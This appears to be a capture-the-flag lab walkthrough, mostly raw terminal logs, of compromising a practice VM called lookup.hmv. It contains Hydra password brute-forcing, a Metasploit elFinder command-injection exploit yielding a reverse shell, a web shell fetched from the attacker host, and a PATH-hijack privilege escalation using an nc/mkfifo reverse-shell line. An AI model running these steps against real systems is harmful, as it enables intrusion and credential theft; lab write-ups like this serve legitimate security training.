┌──(root㉿kali)-[~]
└─# arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:26:ba:73, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:14 (Unknown: locally administered)
192.168.56.100 08:00:27:d6:b8:eb PCS Systemtechnik GmbH
192.168.56.101 08:00:27:79:3a:8a PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.102 seconds (121.79 hosts/sec). 3 responded

┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.56.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 04:52 EST
Nmap scan report for www.smol.hmv (192.168.56.101)
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://lookup.hmv
MAC Address: 08:00:27:79:3A:8A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms www.smol.hmv (192.168.56.101)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.65 seconds

┌──(root㉿kali)-[~]
└─# nikto -h 192.168.56.101
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2024-12-18 04:53:15 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://lookup.hmv
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2024-12-18 04:53:33 (GMT-5) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(root㉿kali)-[~]
└─# echo 192.168.56.101 lookup.hmv > /etc/hosts

Run a whatweb scan

┌──(root㉿kali)-[~/yiyi/tmp]
└─# whatweb -v lookup.hmv
WhatWeb report for http://lookup.hmv
Status : 200 OK
Title : Login Page
IP : 192.168.56.101
Country : RESERVED, ZZ

Summary : Apache[2.4.41], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], PasswordField[password]

Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.

Version : 2.4.41 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/

[ HTML5 ]
HTML version 5, detected by the doctype declaration


[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.

OS : Ubuntu Linux
String : Apache/2.4.41 (Ubuntu) (from server string)

[ PasswordField ]
find password fields

String : password (from field name)

HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 18:04:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 359
Connection: close
Content-Type: text/html; charset=UTF-8

Tried SQL injection, with no result

┌──(root㉿kali)-[~/yiyi/tmp]
└─# sqlmap -r req.txt --dbs --batch
___
__H__
___ ___[.]_____ ___ ___ {1.8.11#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:02:51 /2024-12-18/

[05:02:51] [INFO] parsing HTTP request from 'req.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[05:02:51] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'http://lookup.hmv'. Do you want to apply it from now on? [Y/n] Y
[05:02:51] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[05:02:51] [INFO] testing if the target URL content is stable
[05:02:51] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[05:02:51] [INFO] searching for dynamic content
[05:02:51] [CRITICAL] target URL content appears to be heavily dynamic. sqlmap is going to retry the request(s)
[05:02:51] [WARNING] target URL content appears to be too dynamic. Switching to '--text-only'
[05:02:51] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[05:02:51] [INFO] (custom) POST parameter '#1*' appears to be dynamic
[05:02:51] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[05:02:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:02:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:02:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[05:02:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[05:02:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[05:02:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[05:02:52] [INFO] testing 'Generic inline queries'
[05:02:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[05:02:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[05:02:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[05:02:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:02:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[05:02:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[05:02:52] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[05:02:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[05:02:52] [WARNING] (custom) POST parameter '#1*' does not seem to be injectable
[05:02:52] [INFO] testing if (custom) POST parameter '#2*' is dynamic
[05:02:52] [INFO] (custom) POST parameter '#2*' appears to be dynamic
[05:02:52] [INFO] testing for SQL injection on (custom) POST parameter '#2*'
[05:02:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:02:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:02:53] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[05:02:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[05:02:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[05:02:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[05:02:53] [INFO] testing 'Generic inline queries'
[05:02:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[05:02:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[05:02:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[05:02:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:02:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[05:02:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[05:02:53] [INFO] testing 'Oracle AND time-based blind'
[05:02:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[05:02:53] [WARNING] (custom) POST parameter '#2*' does not seem to be injectable
[05:02:53] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 05:02:53 /2024-12-18/

A round of fuzzing

┌──(root㉿kali)-[~/yiyi/tmp]
└─# ffuf -c -u http://$IP -H "Host: FUZZ.lookup.hmv" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --fs 0

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.lookup.hmv
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________

:: Progress: [19966/19966] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 19966 ::

Brute-force the credentials with Hydra

┌──(root㉿kali)-[~/yiyi/tmp]
└─# hydra -l admin -P /root/yiyi/rockyou.txt -f lookup.hmv http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong password"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-18 05:11:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://lookup.hmv:80/login.php:username=^USER^&password=^PASS^:Wrong password
[80][http-post-form] host: lookup.hmv login: admin password: password123
[STATUS] attack finished for lookup.hmv (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-18 05:12:01

The "Wrong password" message no longer appears, which means the username is the part that is wrong

Brute-force again

┌──(root㉿kali)-[~/yiyi/tmp]
└─# hydra -L /root/yiyi/rockyou.txt -p password123 -f lookup.hmv http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong username"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-18 05:15:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task
[DATA] attacking http-post-form://lookup.hmv:80/login.php:username=^USER^&password=^PASS^:Wrong username
[STATUS] 4577.00 tries/min, 4577 tries in 00:01h, 14339822 to do in 52:14h, 16 active
[80][http-post-form] host: lookup.hmv login: jose password: password123
[STATUS] attack finished for lookup.hmv (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-18 05:18:28

After logging in, it redirects to files.lookup.hmv

Add it to the hosts file

┌──(root㉿kali)-[~]
└─# echo 192.168.56.101 lookup.hmv files.lookup.hmv > /etc/hosts

We land on this thing

Scanning with dirsearch turns up /elFinder/Changelog

That shows the version

Go straight for a known exploit

┌──(root㉿kali)-[~/tmp]
└─# msfconsole
Metasploit tip: Metasploit can be configured at startup, see msfconsole
--help to learn more


______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|


=[ metasploit v6.4.34-dev ]
+ -- --=[ 2461 exploits - 1267 auxiliary - 431 post ]
+ -- --=[ 1471 payloads - 49 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

[*] Starting persistent handler(s)...
msf6 > search elfinder

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution
1 exploit/unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability
2 exploit/multi/http/wp_file_manager_rce 2020-09-09 normal Yes WordPress File Manager Unauthenticated Remote Code Execution
3 exploit/linux/http/elfinder_archive_cmd_injection 2021-06-13 excellent Yes elFinder Archive Command Injection
4 exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection


Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection

msf6 > use 4
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > show options

Module options (exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /elFinder/ yes The base path to elFinder
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.160.100 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Auto



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts files.lookup.hmv
rhosts => files.lookup.hmv
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.160.100:4444
[*] Uploading payload 'TWV0K4.jpg;echo 6370202e2e2f66696c65732f545756304b342e6a70672a6563686f2a202e625637636e76474134342e706870 |xxd -r -p |sh& #.jpg' (1962 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder/php/.bV7cnvGA44.php) ...
[*] Removing uploaded file ...
[+] Deleted uploaded file
[!] This exploit may require manual cleanup of '.bV7cnvGA44.php' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > show options

Module options (exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS files.lookup.hmv yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /elFinder/ yes The base path to elFinder
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.160.100 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Auto



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > cat /etc/hosts
[*] exec: cat /etc/hosts

192.168.56.101 lookup.hmv files.lookup.hmv
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set lhost 192.168.56.102
lhost => 192.168.56.102
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.56.102:4444
[*] Uploading payload 'EZcGr0.jpg;echo 6370202e2e2f66696c65732f455a634772302e6a70672a6563686f2a202e56375273615774702e706870 |xxd -r -p |sh& #.jpg' (1943 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder/php/.V7RsaWtp.php) ...
[*] Sending stage (40004 bytes) to 192.168.56.101
[+] Deleted .V7RsaWtp.php
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:34062) at 2024-12-18 05:37:25 -0500
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file

meterpreter > shell -t
[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 2694 created.
Channel 0 created.
www-data@lookup:/var/www/files.lookup.hmv/public_html/elFinder/php$

Upload a web shell to keep access

www-data@lookup:/var/www/files.lookup.hmv/public_html$ ls
ls
elFinder index.php
www-data@lookup:/var/www/files.lookup.hmv/public_html$ wget http://192.168.56.102/shell.php
02/shell.php/192.168.56.10
--2024-12-18 18:41:56-- http://192.168.56.102/shell.php
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2489 (2.4K) [application/octet-stream]
Saving to: 'shell.php'

shell.php 100%[===================>] 2.43K --.-KB/s in 0s

2024-12-18 18:41:56 (313 MB/s) - 'shell.php' saved [2489/2489]

Start a listener on this side, and visit http://files.lookup.hmv/elFinder/Changelog on the other

Check for SUID binaries

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@lookup:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
/snap/core20/1950/usr/bin/gpasswd
/snap/core20/1950/usr/bin/mount
/snap/core20/1950/usr/bin/newgrp
/snap/core20/1950/usr/bin/passwd
/snap/core20/1950/usr/bin/su
/snap/core20/1950/usr/bin/sudo
/snap/core20/1950/usr/bin/umount
/snap/core20/1950/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1950/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pwm
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount

There is a pwm binary, worth a look

www-data@lookup:/$ strings /usr/sbin/pwm
strings /usr/sbin/pwm
/lib64/ld-linux-x86-64.so.2
libc.so.6
fopen
perror
puts
__stack_chk_fail
putchar
popen
fgetc
__isoc99_fscanf
fclose
pclose
__cxa_finalize
__libc_start_main
snprintf
GLIBC_2.4
GLIBC_2.7
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
[!] Running 'id' command to extract the username and user ID (UID)
[-] Error executing id command
uid=%*u(%[^)])
[-] Error reading username from id command
[!] ID: %s
/home/%s/.passwords
[-] File /home/%s/.passwords not found
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8061
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
pwm.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__isoc99_fscanf@@GLIBC_2.7
puts@@GLIBC_2.2.5
_edata
fclose@@GLIBC_2.2.5
__stack_chk_fail@@GLIBC_2.4
pclose@@GLIBC_2.2.5
snprintf@@GLIBC_2.2.5
fgetc@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
popen@@GLIBC_2.2.5
fopen@@GLIBC_2.2.5
perror@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
www-data@lookup:/$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found
www-data@lookup:/$

It looks like it does something with the .passwords file in a user's home directory, so let's look under /home

www-data@lookup:/home$ cd think
cd think/
www-data@lookup:/home/think$ ls -al
ls -al
total 40
drwxr-xr-x 5 think think 4096 Jan 11 2024 .
drwxr-xr-x 3 root root 4096 Jun 2 2023 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rwxr-xr-x 1 think think 220 Jun 2 2023 .bash_logout
-rwxr-xr-x 1 think think 3771 Jun 2 2023 .bashrc
drwxr-xr-x 2 think think 4096 Jun 21 2023 .cache
drwx------ 3 think think 4096 Aug 9 2023 .gnupg
-rw-r----- 1 root think 525 Jul 30 2023 .passwords
-rwxr-xr-x 1 think think 807 Jun 2 2023 .profile
drw-r----- 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Jun 21 2023 .viminfo -> /dev/null
-rw-r----- 1 root think 33 Jul 30 2023 user.txt

No read permission

Privilege escalation by hijacking the PATH environment variable

www-data@lookup:/home/think$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 4444 >/tmp/f" >/tmp/id
<sh -i 2>&1|nc 192.168.56.102 1234 >/tmp/f" >/tmp/id
www-data@lookup:/home/think$ chmod +x /tmp/id
chmod +x /tmp/id
www-data@lookup:/home/think$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@lookup:/home/think$ which id
which id
/tmp/id

With a listener running, executing pwm pops a shell back, which confirms that our fake id is the one being called

So we can make id report think instead

At this point we can fully fake think's id output

www-data@lookup:/$ /usr/bin/id            
/usr/bin/id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@lookup:/$ /usr/bin/id think
/usr/bin/id think
uid=1000(think) gid=1000(think) groups=1000(think)

Now we only need a script that echoes the output of /usr/bin/id think, which is enough to fake think's id

www-data@lookup:/$ echo 'echo "uid=1000(think) gid=1000(think) groups=1000(think)"' >/tmp/id             
<hink) gid=1000(think) groups=1000(think)"' >/tmp/id
www-data@lookup:/$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
jose1001teles
jose100190
jose10001
jose10.asd
jose10+
jose0_07
jose0990
jose0986$
jose098130443
jose0981
jose0924
jose0923
jose0921
thepassword
jose(1993)
jose'sbabygurl
jose&vane
jose&takie
jose&samantha
jose&pam
jose&jlo
jose&jessica
jose&jessi
josemario.AKA(think)
jose.medina.
jose.mar
jose.luis.24.oct
jose.line
jose.leonardo100
jose.leas.30
jose.ivan
jose.i22
jose.hm
jose.hater
jose.fa
jose.f
jose.dont
jose.d
jose.com}
jose.com
jose.chepe_06
jose.a91
jose.a
jose.96.
jose.9298
jose.2856171
www-data@lookup:/$

Brute-force SSH

┌──(root㉿kali)-[~/yiyi/tmp]
└─# hydra -l think -P pass.txt ssh://192.168.56.101 -V -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-18 06:14:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:1/p:49), ~4 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose1006" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose1004" - 2 of 49 [child 1] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose1002" - 3 of 49 [child 2] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose1001teles" - 4 of 49 [child 3] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose100190" - 5 of 49 [child 4] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose10001" - 6 of 49 [child 5] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose10.asd" - 7 of 49 [child 6] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose10+" - 8 of 49 [child 7] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0_07" - 9 of 49 [child 8] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0990" - 10 of 49 [child 9] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0986$" - 11 of 49 [child 10] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose098130443" - 12 of 49 [child 11] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0981" - 13 of 49 [child 12] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0924" - 14 of 49 [child 13] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0923" - 15 of 49 [child 14] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0921" - 16 of 49 [child 15] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "thepassword" - 17 of 52 [child 6] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose(1993)" - 18 of 52 [child 1] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose'sbabygurl" - 19 of 52 [child 3] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&vane" - 20 of 52 [child 4] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&takie" - 21 of 52 [child 5] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&samantha" - 22 of 52 [child 9] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&pam" - 23 of 52 [child 2] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&jlo" - 24 of 52 [child 8] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&jessica" - 25 of 52 [child 15] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&jessi" - 26 of 52 [child 0] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "josemario.AKA(think)" - 27 of 52 [child 7] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose.medina." - 28 of 52 [child 10] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose.mar" - 29 of 52 [child 11] (0/3)
[22][ssh] host: 192.168.56.101 login: think password: josemario.AKA(think)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-18 06:14:42

┌──(root㉿kali)-[~/yiyi/tmp]
└─# ssh think@192.168.56.101
think@192.168.56.101's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed 18 Dec 2024 07:15:50 PM UTC

System load: 0.02 Processes: 210
Usage of /: 58.7% of 9.75GB Users logged in: 0
Memory usage: 40% IPv4 address for enp0s17: 192.168.56.101
Swap usage: 0%

* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
